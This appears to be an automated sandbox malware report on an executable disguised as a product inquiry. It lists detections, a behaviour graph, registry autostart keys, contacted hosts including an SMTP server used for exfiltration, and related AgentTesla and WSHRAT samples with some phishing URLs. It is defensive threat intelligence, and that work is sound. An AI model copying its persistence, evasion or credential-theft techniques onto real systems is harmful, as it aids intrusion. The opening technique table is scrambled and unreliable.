                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		2
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		531
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron11
                    Registry Run Keys / Startup Folder                    		11
                    Registry Run Keys / Startup Folder                    		1
                    Timestomp                    		NTDS1
                    Process Discovery                    		Distributed Component Object Model1
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets151
                    Virtualization/Sandbox Evasion                    		SSHKeylogging23
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                    Masquerading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                    Virtualization/Sandbox Evasion                    		DCSync1
                    System Network Configuration Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job411
                    Process Injection                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Hidden Files and Directories                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1437973 Sample: RFQ678903423_PROD_INQUIRY_S... Startdate: 08/05/2024 Architecture: WINDOWS Score: 100 74 smtp.zoho.eu 2->74 76 ip-api.com 2->76 78 4 other IPs or domains 2->78 86 Found malware configuration 2->86 88 Malicious sample detected (through community Yara rule) 2->88 90 Multi AV Scanner detection for submitted file 2->90 92 17 other signatures 2->92 10 RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe 1 8 2->10         started        14 svchost.exe 1 4 2->14         started        16 svchost.exe 2->16         started        18 4 other processes 2->18 signatures3 process4 file5 70 C:\Users\user\AppData\Roaming\svchost.exe, PE32+ 10->70 dropped 120 Creates multiple autostart registry keys 10->120 122 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->122 124 Drops PE files with benign system names 10->124 20 cmd.exe 1 10->20         started        22 cmd.exe 1 10->22         started        25 conhost.exe 10->25         started        126 Multi AV Scanner detection for dropped file 14->126 128 Writes to foreign memory regions 14->128 130 Allocates memory in foreign processes 14->130 132 Disables UAC (registry) 14->132 27 InstallUtil.exe 14->27         started        35 4 other processes 14->35 134 Adds a directory exclusion to Windows Defender 16->134 136 Sample uses process hollowing technique 16->136 138 Injects a PE file into a foreign processes 16->138 31 jsc.exe 16->31         started        37 4 other processes 16->37 33 AddInProcess32.exe 18->33         started        39 11 other processes 18->39 signatures6 process7 dnsIp8 41 svchost.exe 4 20->41         started        44 conhost.exe 20->44         started        46 timeout.exe 1 20->46         started        94 Uses schtasks.exe or at.exe to add and modify task schedules 22->94 48 schtasks.exe 1 22->48         started        50 conhost.exe 22->50         started        82 ip-api.com 208.95.112.1, 49731, 49733, 49746 TUT-ASUS United States 27->82 84 api.ipify.org 104.26.13.205, 443, 49730, 49732 CLOUDFLARENETUS United States 27->84 72 C:\Users\user\AppData\...\vexplorers.exe, PE32 27->72 dropped 96 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 27->96 98 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 27->98 100 Tries to steal Mail credentials (via file / registry access) 27->100 110 2 other signatures 27->110 102 Tries to harvest and steal ftp login credentials 31->102 104 Tries to harvest and steal browser information (history, passwords, etc) 31->104 106 Hides that the sample has been downloaded from the Internet (zone.identifier) 31->106 52 conhost.exe 35->52         started        54 conhost.exe 37->54         started        108 Loading BitLocker PowerShell Module 39->108 56 conhost.exe 39->56         started        file9 signatures10 process11 signatures12 112 Writes to foreign memory regions 41->112 114 Allocates memory in foreign processes 41->114 116 Adds a directory exclusion to Windows Defender 41->116 118 2 other signatures 41->118 58 MSBuild.exe 41->58         started        62 powershell.exe 41->62         started        64 jsc.exe 41->64         started        66 7 other processes 41->66 process13 dnsIp14 80 smtp.zoho.eu 185.230.214.164, 49739, 49742, 49748 COMPUTERLINEComputerlineSchlierbachSwitzerlandCH Netherlands 58->80 140 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 58->140 142 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 58->142 144 Tries to steal Mail credentials (via file / registry access) 58->144 146 Hides that the sample has been downloaded from the Internet (zone.identifier) 58->146 148 Loading BitLocker PowerShell Module 62->148 68 conhost.exe 62->68         started        signatures15 process16

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe37%ReversingLabsByteCode-MSIL.Trojan.Nekark
                    RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe25%VirustotalBrowse
                    RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\svchost.exe37%ReversingLabsByteCode-MSIL.Trojan.Nekark
                    C:\Users\user\AppData\Roaming\svchost.exe36%VirustotalBrowse
                    C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe0%ReversingLabs
                    C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe0%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    bg.microsoft.map.fastly.net0%VirustotalBrowse
                    fp2e7a.wpc.phicdn.net0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://status.thawte.com0:0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    smtp.zoho.eu
                    		185.230.214.164
                    		truefalse
                      		high
                      bg.microsoft.map.fastly.net
                      		199.232.214.172
                      		truefalseunknown
                      api.ipify.org
                      		104.26.13.205
                      		truefalse
                        		high
                        ip-api.com
                        		208.95.112.1
                        		truefalse
                          		high
                          fp2e7a.wpc.phicdn.net
                          		192.229.211.108
                          		truefalseunknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                            		high
                            http://ip-api.com/line/?fields=hostingfalse
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://api.ipify.orgsvchost.exe, 0000000A.00000002.1951190826.0000021690011000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1951190826.0000021690133000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2868061435.0000000000437000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002961000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://upx.sf.netAmcache.hve.18.drfalse
                                  		high
                                  https://account.dyn.com/svchost.exe, 0000000A.00000002.1951190826.0000021690011000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1951190826.0000021690133000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2868048682.0000000000438000.00000040.00000400.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.ipify.org/tInstallUtil.exe, 0000000F.00000002.2877570286.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002961000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, 00000000.00000002.1664238561.000002091F998000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002961000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0InstallUtil.exe, 0000000F.00000002.2920560159.0000000005D70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2870944580.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2874204896.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CE1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005D80000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2870897490.0000000000DC6000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2870404709.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2926843010.0000000005F90000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2871849560.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002DE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://cdp.thawte.com/ThawteTLSRSACAG1.crl0pInstallUtil.exe, 0000000F.00000002.2920560159.0000000005D70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2870944580.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2874204896.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CE1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005D80000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2870897490.0000000000DC6000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2870404709.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2926843010.0000000005F90000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2871849560.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002DE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://status.thawte.com0:InstallUtil.exe, 0000000F.00000002.2920560159.0000000005D70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2870944580.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2874204896.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CE1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005D80000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2870897490.0000000000DC6000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2870404709.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2926843010.0000000005F90000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2871849560.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002DE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://smtp.zoho.euInstallUtil.exe, 0000000F.00000002.2877570286.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002D2F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002DE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://ip-api.comInstallUtil.exe, 0000000F.00000002.2877570286.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                208.95.112.1
                                                		ip-api.comUnited States
                                                		53334TUT-ASUSfalse
                                                185.230.214.164
                                                		smtp.zoho.euNetherlands
                                                		41913COMPUTERLINEComputerlineSchlierbachSwitzerlandCHfalse
                                                104.26.13.205
                                                		api.ipify.orgUnited States
                                                		13335CLOUDFLARENETUSfalse

                                                General Information

                                                Joe Sandbox version:40.0.0 Tourmaline
                                                Analysis ID:1437973
                                                Start date and time:2024-05-08 09:20:06 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 9m 53s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:58
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe
                                                Detection:MAL
                                                Classification:mal100.spre.troj.spyw.expl.evad.winEXE@87/48@3/3
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 88%
                                                • Number of executed functions: 125
                                                • Number of non-executed functions: 3
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                • Excluded IPs from analysis (whitelisted): 20.190.190.131, 40.126.62.130, 40.126.62.132, 40.126.62.131, 20.190.190.194, 20.190.190.129, 20.190.190.195, 40.126.62.129, 20.114.59.183, 199.232.214.172, 192.229.211.108, 52.165.164.15, 20.42.65.92, 13.85.23.206, 20.189.173.20
                                                • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtCreateKey calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                08:20:55Task SchedulerRun new task: svchost path: "C:\Users\user\AppData\Roaming\svchost.exe"
                                                08:20:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\Users\user\AppData\Roaming\svchost.exe"
                                                08:21:07AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\Users\user\AppData\Roaming\svchost.exe"
                                                08:21:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run vexplorers C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe
                                                08:21:29AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run vexplorers C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe
                                                09:21:04API Interceptor78x Sleep call for process: powershell.exe modified
                                                09:21:04API Interceptor317514x Sleep call for process: InstallUtil.exe modified
                                                09:21:08API Interceptor595828x Sleep call for process: MSBuild.exe modified
                                                09:21:15API Interceptor416978x Sleep call for process: AddInProcess32.exe modified
                                                09:21:20API Interceptor4x Sleep call for process: WerFault.exe modified
                                                09:21:24API Interceptor270064x Sleep call for process: jsc.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                208.95.112.1QUOTATION_MAYQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • ip-api.com/line/?fields=hosting
                                                Purchase Order - PO24108267.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                • ip-api.com/line/?fields=hosting
                                                Invoice-883973938.jsGet hashmaliciousWSHRATBrowse
                                                • ip-api.com/json/
                                                Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                                                • ip-api.com/json/
                                                _____PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                • ip-api.com/line/?fields=hosting
                                                Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                                                • ip-api.com/json/
                                                Pending_Invoice_Bank_Details_kofce_.JS.jsGet hashmaliciousWSHRATBrowse
                                                • ip-api.com/json/
                                                DHL Receipt_AWB 98996913276.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • ip-api.com/line/?fields=hosting
                                                DHL Shipment Notification.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • ip-api.com/line/?fields=hosting
                                                STATEMENT OF ACCOUNT DHL - 717036431.exeGet hashmaliciousAgentTeslaBrowse
                                                • ip-api.com/line/?fields=hosting
                                                185.230.214.164INQUIRY#46789_MAY24_PLANEX_SERVICES_CONTRACTING_GOODS.exeGet hashmaliciousAgentTeslaBrowse
                                                  VBG dk Payment Receipt --doc87349281.batGet hashmaliciousRemcos, AgentTesla, DBatLoaderBrowse
                                                    104.26.13.205ReturnLegend.exeGet hashmaliciousStealitBrowse
                                                    • api.ipify.org/?format=json
                                                    SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                                    • api.ipify.org/
                                                    Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                                    • api.ipify.org/?format=json
                                                    ArenaWarSetup.exeGet hashmaliciousStealitBrowse
                                                    • api.ipify.org/?format=json
                                                    Sky-Beta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                    • api.ipify.org/?format=json
                                                    E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                    • api.ipify.org/
                                                    E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                    • api.ipify.org/
                                                    SecuriteInfo.com.Win64.RATX-gen.31127.4101.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                                    • api.ipify.org/

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    fp2e7a.wpc.phicdn.nethttps://u33127076.ct.sendgrid.net/ls/click?upn=u001.Dd8nu0w4qSl621Cfl5NzldfyZqjD9RWJslL2MWwt7pDZEhaAcTHbAT3eWd4fAnA0vrf6npFQIFebeFGCrAnwiA-3D-3DfmjQ_R-2Flyyz82d9aOYqi4-2FHSXVn4q8KaU22YObPyTKvaTTvltLHJTsQx6vicSpweVOt1Q2PhJWPHHTxt6yAPEzhfNUDUG5D5ilhJHkL1NI-2BWX2-2BDDI93AOg7LpunA0BU-2BZBoDgn6A5Z8xcvffpNwXtypTCusIOi-2BlO0xNH4h8I6EM-2FpelF-2BaCcmwOfdvxekMe-2FJpx-2B7DaCkmWjXbM0S7yd7UfMQ-3D-3DGet hashmaliciousUnknownBrowse
                                                    • 192.229.211.108
                                                    https://url.us.m.mimecastprotect.com/s/NqNQClYX45S1PxGimFEoZ?domain=urldefense.proofpoint.comGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                    • 192.229.211.108
                                                    https://flow.page/dnjetsdocsGet hashmaliciousUnknownBrowse
                                                    • 192.229.211.108
                                                    https://t.email.caixabank.com/r/?id=h53014a64,6db27ee6,f3bae0f&p1=tambatourism.jp/g/c3lsdmllLnJvbGxhbmRAYXNuLmNvbQ==Get hashmaliciousUnknownBrowse
                                                    • 192.229.211.108
                                                    https://docomo3903-tatad0c0movsnl3932.000webhostapp.comGet hashmaliciousUnknownBrowse
                                                    • 192.229.211.108
                                                    https://app.nyheder.danskespil.dk/e/f2?elqFormName=4ChangePermission&elqSiteID=414837471&DataSourceID=706382&emailPermission=0&redirect=https://kotobukitabi.com/s/anVlcmdlbi5zZWlkbGVyQGlwcm90ZXguZGU=Get hashmaliciousUnknownBrowse
                                                    • 192.229.211.108
                                                    https://subscription-management.paddle.com/subscription/23736269/hash/48f17787dd06251c79832319a0cd81181e25b6488ec57eb96bdbfa63d118f311/manage-subscriptionGet hashmaliciousUnknownBrowse
                                                    • 192.229.211.108
                                                    http://link.csrwire.com/ls/click?upn=u001.Si0DiArC1V8ZAnBzMk9-2BdVKW245QccVJHq5a8ac9PL1cxKEohrdYzj-2Bi8X2xywdF5x014kxhAPztuH7dRixzSCWE-2BJwchVhYZ74Ivk5CnEAPFl7yJBY43wNoXEBfuRY7zCLn7IFjGzLO2VDHwzMa6b1dQgFTMqVrhr7lYKJs9qSYs-2BIWqneYUpThOMtW8ZRR6Iy8ZluudY9oUF69ErkVqA6gMOP6hsn18i6QDKKSZnC9POFmoqBrhkCOfvuGx9Sc68KnispIMnuYFYdoZ7hCy4nEg9MV1nHjooH2bSknJrw-3DJv90_uasUJFZdY7eaP30o1d8eQUWw-2Fg5FtJnmGNkAfKTWGhPhZj2SRXHcVkFycTbmteiR49Bsg0-2F8UnMQZ-2BR1nBerdNQt382IwC0Ybind3mrVDI96pH29g-2B-2FpnDj32EOLxLVmUeZ6iStdbanLNsSZ-2FO-2Fxs3A9YoRSDSCn4sC935IKMQ4t22hWlNHnvcd4gxn7IFaZE3maV8vgwBm2PtcJUiXsuRf4Iy-2B-2BJAXRBtIRgFkqBfE-3DGet hashmaliciousHTMLPhisherBrowse
                                                    • 192.229.211.108
                                                    https://url.us.m.mimecastprotect.com/s/LOTCCXD9yEtpw99u6JYxu?domain=urldefense.proofpoint.comGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                    • 192.229.211.108
                                                    https://www.qwikxf.cn/Get hashmaliciousUnknownBrowse
                                                    • 192.229.211.108
                                                    ip-api.comQUOTATION_MAYQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 208.95.112.1
                                                    Purchase Order - PO24108267.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                    • 208.95.112.1
                                                    Invoice-883973938.jsGet hashmaliciousWSHRATBrowse
                                                    • 208.95.112.1
                                                    Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                                                    • 208.95.112.1
                                                    _____PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 208.95.112.1
                                                    Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                                                    • 208.95.112.1
                                                    Pending_Invoice_Bank_Details_kofce_.JS.jsGet hashmaliciousWSHRATBrowse
                                                    • 208.95.112.1
                                                    DHL Receipt_AWB 98996913276.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 208.95.112.1
                                                    DHL Shipment Notification.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 208.95.112.1
